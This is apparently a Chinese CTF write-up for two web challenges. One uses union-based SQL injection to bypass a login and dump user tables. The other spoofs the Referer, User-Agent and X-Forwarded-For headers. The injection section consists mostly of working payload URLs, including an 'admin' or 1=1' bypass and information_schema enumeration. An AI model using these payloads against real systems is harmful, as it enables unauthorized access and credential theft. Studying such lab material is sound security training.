9.lovesql(SQL注入考点)
解题过程:①是否存在SQL注入 ②万能密码 admin' or 1=1 ③爆字段数 ④看回显 ⑤爆数据库 ⑥爆数据库的表 ⑦爆出表的列 ⑧读取内容,爆flag
基础知识点:union 联合查询,information表,group_concat()字符串连接
①是否存在SQL注入:加单引号报错 (语法错误)
/check.php?username=1'&password=2
/check.php?username=1&password=2'
/check.php?username=1'&password=2'
②使用万能密码 admin' or 1=1# 或者1' or 1=1# 密码随便写
(在输入框输入的#,可以直接使用hackbar地址栏,只需要将#进行URL编码,即替换为%23)
③爆字段(判断字段数,或者用union select null(,null,null)来判断)
check.php?username=admin ' order by 1 %23&password=1
check.php?username=admin ' order by 2 %23&password=1
check.php?username=admin ' order by 3 %23&password=1
check.php?username=admin ' order by 4 %23&password=1
发现4个参数报错,说明有3个字段
④看回显
/check.php?username=1' union select 1,2,3%23&password=1
页面显示hello 2! Your password is '3'说明回显点位在2,3
⑤爆数据库
/check.php?username=1' union select 1,database(),version()%23&password=1
⑥爆数据库的表
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
爆出来数据库的表名有geekuser, l0ve1ysq1
⑦爆出表的列(查看两个表)
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'%23&password=1
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=1
页面显示id,username,password
⑧读取内容,爆flag
/check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
或者
/check.php?username=1' union select 1,2,group_concat(username,0x40,password) from l0ve1ysq1 %23&password=1
/check.php?username=1' union select 1,2,group_concat(username,0x40,0x40,password) from l0ve1ysq1 %23&password=1
10.Http(http代理)
基础知识:
X-Forwarded-For(XFF)又名XFF头
1)概述:X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。 Squid 缓存代理服务器的开发人员最早引入了这一HTTP头字段,并由IETF在HTTP头字段标准化草案中正式提出。 2)作用:获得HTTP请求端的真是IP 3)格式: X-Forwarded-For: client1, proxy1, proxy2, proxy3 其中client1是原始客户端的IP,后面接着是代理服务器的IP
Referer请求头字段
1)概述:Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。
2)作用:告诉服务器该请求是通过哪个页面发送过来的,从而使服务器进行对应的处理。
3)格式:Referer:url(此处为页面链接)
User-Agent请求头字段
1)概述:User-Agent是HTTP请求中用来检查浏览页面的访问者在用什么操作系统(包括版本号)浏览器(包括版本号)和用户个人偏好的字段。
2)作用:告知服务器访问页面的客户是什么操作系统(包括版本号)浏览器(包括版本号)和用户个人偏好
3)格式:User-Agent:Mozilla/5.0 (平台) 引擎版本 浏览器版本号 (此为通常格式)
解题过程:
查看网页源代码,发现Secret.php,点开后发现是"it doesn't come from 'https://Sycsecret.buuoj.cn'",提示该网页的Referer头为"https://Sycsecret.buuoj.cn",在请求头中添加Referer:https://Sycsecret.buuoj.cn字段发送请求后得到响应为
使用"Syclover" browser,于是将User-Agent改为"Syclover" brower即可
根据提示,是来自本地的访问请求,所以更改XFF头为127.0.0.1
爆出flag